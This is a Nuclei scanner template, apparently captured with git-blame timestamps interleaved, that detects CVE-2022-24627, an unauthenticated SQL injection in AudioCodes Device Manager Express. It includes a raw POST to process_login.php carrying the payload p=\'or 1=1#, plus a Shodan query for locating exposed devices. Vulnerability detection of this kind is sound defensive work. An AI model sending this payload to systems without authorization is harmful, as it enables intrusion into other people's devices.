2024-01-31 11:28:34 +00:00
id : CVE-2022-24627
2023-06-12 00:40:38 +00:00
info :
2024-01-31 11:28:34 +00:00
name : AudioCodes Device Manager Express - SQL Injection
author : geeknik
severity : critical
2024-04-16 09:16:06 +00:00
description : |
An issue was discovered in AudioCodes Device Manager Express through 7.8.20002.47752. It is an unauthenticated SQL injection in the p parameter of the process_login.php login form.
2023-06-14 16:28:05 +00:00
reference :
2024-01-31 11:28:34 +00:00
- https://seclists.org/fulldisclosure/2023/Feb/12
- https://nvd.nist.gov/vuln/detail/CVE-2022-24627
2024-04-16 10:06:04 +00:00
- https://github.com/tr3ss/newclei
2023-06-14 16:28:05 +00:00
classification :
2024-04-16 09:16:06 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2024-01-31 11:28:34 +00:00
cve-id : CVE-2022-24627
2024-04-16 09:16:06 +00:00
cwe-id : CWE-89
2024-04-16 10:06:04 +00:00
epss-score : 0.00109
epss-percentile : 0.43163
2024-04-16 09:16:06 +00:00
cpe : cpe:2.3:a:audiocodes:device_manager_express:*:*:*:*:*:*:*:*
metadata :
verified : true
max-request : 2
vendor : audiocodes
product : device_manager_express
2024-04-16 10:06:04 +00:00
shodan-query : title:"Audiocodes"
tags : cve,cve2022,seclists,sqli,audiocodes
2023-06-12 00:40:38 +00:00
2024-04-16 09:16:06 +00:00
flow : http(1) && http(2)
2023-06-12 00:40:38 +00:00
http :
2024-04-16 09:16:06 +00:00
- method : GET
path :
- "{{BaseURL}}"
matchers :
- type : dsl
dsl :
- 'contains(tolower(body), "audiocodes</title>")'
internal : true
2024-01-31 11:28:34 +00:00
- raw :
- |
POST /admin/AudioCodes_files/process_login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
username=admin&password=&domain=&p=%5C%27or+1%3D1%23
2023-06-12 00:40:38 +00:00
matchers :
2024-01-31 11:28:34 +00:00
- type : word
part : body
words :
- "SQL syntax"
- "mysql_fetch"
- "You have an error in your SQL syntax"
condition : or
2024-04-16 10:10:50 +00:00
# digest: 4b0a00483046022100961135146cb72e5ec123441fa9ff5dac7ec092b87f38888f1877ff1a5aa84f1c0221009e345921fc3a9094d5fd253bed1e6361bfae6d60ab6455dcfdafe7658a132668:922c64590222798bb761d5b6d8e72950